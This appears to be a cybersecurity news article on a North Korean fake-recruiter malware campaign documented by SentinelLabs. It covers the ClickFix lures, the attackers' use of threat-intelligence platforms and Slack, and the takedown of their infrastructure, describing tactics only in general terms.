A new wave of cyberattacks tied to North Korea has been uncovered, with hackers posing as recruiters or job seekers to target professionals in blockchain, marketing, and finance. Between March and June 2025, at least 230 people were compromised, though researchers warn the true number of victims is much higher. The campaign, tracked by SentinelLabs, highlights how North Korean actors are abusing Western cyber intelligence platforms and collaboration tools like Slack to run coordinated attacks.
Fake Recruiters Target Blockchain and Finance Professionals
The primary lure used by the attackers is fake job recruitment. Victims receive messages inviting them to apply for lucrative positions, often related to blockchain roles. Once engaged, they are redirected to fraudulent websites where they face seemingly legitimate assessments.
In reality, these assessments deliver malware through tactics such as fake CAPTCHA tests. This method, known as “ClickFix,” tricks users into copying and pasting malicious scripts. According to researchers, the attacks ultimately aim to steal cryptocurrency assets, a consistent priority for North Korean threat groups seeking to fund state projects under heavy sanctions.
SentinelLabs observed that victims were widely distributed around the world, showing no regional bias in the hackers’ targeting.
Expansion of the Contagious Interview Campaign
This operation builds on the “Contagious Interview” campaign first observed in 2023 and linked to the Lazarus Group, a North Korean state-sponsored umbrella organization. Initially, the campaign relied on fake interviews and job offers to trick targets into running malicious code.
Over time, it has evolved into a cluster of coordinated campaigns that exploit multiple social engineering techniques. The attackers are described as pragmatic, often abandoning compromised infrastructure rather than maintaining it, which allows them to avoid detection and move quickly to fresh assets.
As SentinelLabs explained:
“Given the continuous success of their campaigns in engaging targets, it may be more pragmatic and efficient for the threat actors to deploy new infrastructure rather than maintain existing assets.”
Abuse of Western Cyber Intelligence Platforms
One of the most concerning revelations from the investigation is the way North Korean attackers use Western cyber intelligence tools against defenders. Logs accidentally exposed on their servers revealed heavy use of commercial cyber intelligence platforms.
- Validin: Used to track adversaries, domain history, and threat reports. Attackers exploited it to monitor when their infrastructure was flagged and to check the reputation of newly registered domains.
- VirusTotal: Leveraged to see whether their malware samples had already been detected by security vendors.
- Maltrail: An open-source resource listing malicious domains and IPs, repurposed by the hackers as an early warning system.
SentinelLabs noted:
“North Korean threat groups actively examine Cyber Threat Intelligence (CTI) information to identify threats to their operations and improve the resilience and effectiveness of their campaigns, depending on their operational priorities.”
Despite using these tools, the attackers often displayed poor operational security. Researchers observed multiple instances of accidental exposure, such as misconfigured web root directories and leaked files, which helped investigators trace their infrastructure.
Slack Bots Indicate Team-Based Operations
Strong indicators suggest the attackers worked in teams using Slack for coordination. Researchers detected Slack bot requests linked to malicious campaigns, showing that URLs and attack assets were shared and accessed in real time across the group.
This collaboration model allowed the hackers to scale quickly and react when parts of their infrastructure were disrupted. According to SentinelLabs, once service providers took down malicious assets, the attackers rapidly deployed replacements rather than modifying existing systems.
The report points to pressure from revenue quotas imposed by the regime as a driver of this agility. Teams are incentivized to deliver results quickly rather than maintain long-term, coordinated infrastructure.
Disruption of North Korean Infrastructure
Through exposed assets, researchers were able to take meaningful action. SentinelLabs identified and helped dismantle fake recruitment websites, email addresses, IP addresses, and malware distribution servers. This disruption, while temporary, highlights the ongoing cat-and-mouse dynamic between defenders and North Korean actors.
Despite these takedowns, the threat persists. SentinelLabs stressed that the scale of infrastructure and the adaptability of these attackers make it likely that new domains and services will emerge soon.
For enterprises, the campaign demonstrates the growing sophistication of North Korean cyber operations. By abusing legitimate platforms such as Slack and threat intelligence services, attackers blur the line between normal business operations and malicious activity.
Organizations in finance, blockchain, and technology sectors are at particular risk, but the global distribution of victims shows the threat extends to any professional who may be targeted with job offers.
